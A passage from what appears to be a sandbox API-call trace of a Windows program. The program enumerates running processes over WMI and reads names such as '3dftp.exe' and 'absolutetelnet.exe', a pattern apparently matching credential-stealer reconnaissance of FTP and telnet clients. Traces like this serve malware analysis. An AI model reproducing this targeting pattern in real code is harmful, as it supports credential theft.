Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0213.720] IUnknown:Release (This=0x560d644) returned 0x3 [0213.720] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0213.720] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0213.720] IUnknown:QueryInterface (in: This=0x560d640, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0213.720] IUnknown:Release (This=0x560d640) returned 0x2 [0213.720] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0213.720] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0213.720] IUnknown:QueryInterface (in: This=0x560d640, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x560d640) returned 0x0 [0213.720] IUnknown:AddRef (This=0x560d640) returned 0x4 [0213.720] IUnknown:Release (This=0x560d640) returned 0x3 [0213.720] IUnknown:Release (This=0x560d640) returned 0x2 [0213.720] CoTaskMemFree (pv=0x5612588) [0213.720] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0213.720] IUnknown:AddRef (This=0x560d640) returned 0x3 [0213.720] IWbemClassObject:Get (in: This=0x560d640, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0213.721] IWbemClassObject:Get (in: This=0x560d640, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2840\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0213.721] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2840\"") returned 0x66 [0213.721] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2840\"") returned 0x66 [0213.721] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0213.721] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0213.721] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0213.721] IUnknown:Release (This=0x6d0cac) returned 0x1 [0213.722] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5612588) returned 0x0 [0213.722] WbemDefPath:IUnknown:QueryInterface (in: This=0x5612588, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0213.723] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5612588, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x561a040) returned 0x0 [0213.723] WbemDefPath:IUnknown:Release (This=0x5612588) returned 0x0 [0213.723] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a040, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x561a040) returned 0x0 [0213.723] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a040, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0213.723] WbemDefPath:IUnknown:AddRef (This=0x561a040) returned 0x3 [0213.723] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a040, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0213.723] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a040, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0213.723] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a040, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5612598) returned 0x0 [0213.723] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5612598, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0213.723] WbemDefPath:IUnknown:Release (This=0x5612598) returned 0x3 [0213.723] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0213.723] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0213.723] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a040, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0213.724] WbemDefPath:IUnknown:Release (This=0x561a040) returned 0x2 [0213.724] WbemDefPath:IUnknown:Release (This=0x561a040) returned 0x1 [0213.724] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0213.724] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0213.724] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a040, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x561a040) returned 0x0 [0213.724] WbemDefPath:IUnknown:AddRef (This=0x561a040) returned 0x3 [0213.724] WbemDefPath:IUnknown:Release (This=0x561a040) returned 0x2 [0213.724] WbemDefPath:IWbemPath:SetText (This=0x561a040, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2840\"") returned 0x0 [0213.724] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0213.724] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0213.724] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.724] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0213.724] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0213.724] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.724] IWbemClassObject:Get (in: This=0x560d640, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2687018*=0, plFlavor=0x268701c*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="3dftp.exe", varVal2=0x0), pType=0x2687018*=8, plFlavor=0x268701c*=0) returned 0x0 [0213.724] SysStringByteLen (bstr="3dftp.exe") returned 0x12 [0213.724] SysStringByteLen (bstr="3dftp.exe") returned 0x12 [0213.724] IWbemClassObject:Get (in: This=0x560d640, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2687018*=8, plFlavor=0x268701c*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="3dftp.exe", varVal2=0x0), pType=0x2687018*=8, plFlavor=0x268701c*=0) returned 0x0 [0213.725] SysStringByteLen (bstr="3dftp.exe") returned 0x12 [0213.725] SysStringByteLen (bstr="3dftp.exe") returned 0x12 [0213.725] CoTaskMemAlloc (cb=0x4) returned 0x56125c8 [0213.725] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x56125c8, puReturned=0x267acc0 | out: apObjects=0x56125c8*=0x560d7d8, puReturned=0x267acc0*=0x1) returned 0x0 [0213.857] IUnknown:QueryInterface (in: This=0x560d7d8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x560d7d8) returned 0x0 [0213.857] IUnknown:QueryInterface (in: This=0x560d7d8, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0213.857] IUnknown:QueryInterface (in: This=0x560d7d8, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0213.857] IUnknown:AddRef (This=0x560d7d8) returned 0x3 [0213.858] IUnknown:QueryInterface (in: This=0x560d7d8, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0213.858] IUnknown:QueryInterface (in: This=0x560d7d8, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0213.858] IUnknown:QueryInterface (in: This=0x560d7d8, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x560d7dc) returned 0x0 [0213.858] IMarshal:GetUnmarshalClass (in: This=0x560d7dc, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0213.858] IUnknown:Release (This=0x560d7dc) returned 0x3 [0213.858] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0213.858] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0213.858] IUnknown:QueryInterface (in: This=0x560d7d8, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0213.858] IUnknown:Release (This=0x560d7d8) returned 0x2 [0213.858] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0213.858] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0213.858] IUnknown:QueryInterface (in: This=0x560d7d8, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x560d7d8) returned 0x0 [0213.858] IUnknown:AddRef (This=0x560d7d8) returned 0x4 [0213.858] IUnknown:Release (This=0x560d7d8) returned 0x3 [0213.858] IUnknown:Release (This=0x560d7d8) returned 0x2 [0213.858] CoTaskMemFree (pv=0x56125c8) [0213.858] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0213.858] IUnknown:AddRef (This=0x560d7d8) returned 0x3 [0213.858] IWbemClassObject:Get (in: This=0x560d7d8, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0213.859] IWbemClassObject:Get (in: This=0x560d7d8, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2848\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0213.859] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2848\"") returned 0x66 [0213.859] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2848\"") returned 0x66 [0213.859] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0213.859] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0213.859] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0213.859] IUnknown:Release (This=0x6d0cac) returned 0x1 [0213.860] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x56125c8) returned 0x0 [0213.860] WbemDefPath:IUnknown:QueryInterface (in: This=0x56125c8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0213.860] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56125c8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x561a120) returned 0x0 [0213.860] WbemDefPath:IUnknown:Release (This=0x56125c8) returned 0x0 [0213.860] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a120, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x561a120) returned 0x0 [0213.860] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a120, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0213.861] WbemDefPath:IUnknown:AddRef (This=0x561a120) returned 0x3 [0213.861] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a120, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0213.861] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a120, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0213.861] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a120, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x56125d8) returned 0x0 [0213.861] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56125d8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0213.861] WbemDefPath:IUnknown:Release (This=0x56125d8) returned 0x3 [0213.861] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0213.861] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0213.861] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a120, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0213.861] WbemDefPath:IUnknown:Release (This=0x561a120) returned 0x2 [0213.861] WbemDefPath:IUnknown:Release (This=0x561a120) returned 0x1 [0213.861] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0213.861] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0213.861] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a120, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x561a120) returned 0x0 [0213.861] WbemDefPath:IUnknown:AddRef (This=0x561a120) returned 0x3 [0213.861] WbemDefPath:IUnknown:Release (This=0x561a120) returned 0x2 [0213.861] WbemDefPath:IWbemPath:SetText (This=0x561a120, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2848\"") returned 0x0 [0213.861] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0213.861] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0213.861] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.862] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0213.862] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0213.862] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.862] IWbemClassObject:Get (in: This=0x560d7d8, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x268787c*=0, plFlavor=0x2687880*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="absolutetelnet.exe", varVal2=0x0), pType=0x268787c*=8, plFlavor=0x2687880*=0) returned 0x0 [0213.862] SysStringByteLen (bstr="absolutetelnet.exe") returned 0x24 [0213.862] SysStringByteLen (bstr="absolutetelnet.exe") returned 0x24 [0213.862] IWbemClassObject:Get (in: This=0x560d7d8, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x268787c*=8, plFlavor=0x2687880*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="absolutetelnet.exe", varVal2=0x0), pType=0x268787c*=8, plFlavor=0x2687880*=0) returned 0x0 [0213.862] SysStringByteLen (bstr="absolutetelnet.exe") returned 0x24 [0213.862] SysStringByteLen (bstr="absolutetelnet.exe") returned 0x24 [0213.862] CoTaskMemAlloc (cb=0x4) returned 0x5612608 [0213.862] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5612608, puReturned=0x267acc0 | out: apObjects=0x5612608*=0x560d970, puReturned=0x267acc0*=0x1) returned 0x0 [0213.863] IUnknown:QueryInterface (in: This=0x560d970, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x560d970) returned 0x0 [0213.863] IUnknown:QueryInterface (in: This=0x560d970, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0213.863] IUnknown:QueryInterface (in: This=0x560d970, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0213.864] IUnknown:AddRef (This=0x560d970) returned 0x3 [0213.864] IUnknown:QueryInterface (in: This=0x560d970, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0213.864] IUnknown:QueryInterface (in: This=0x560d970, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, 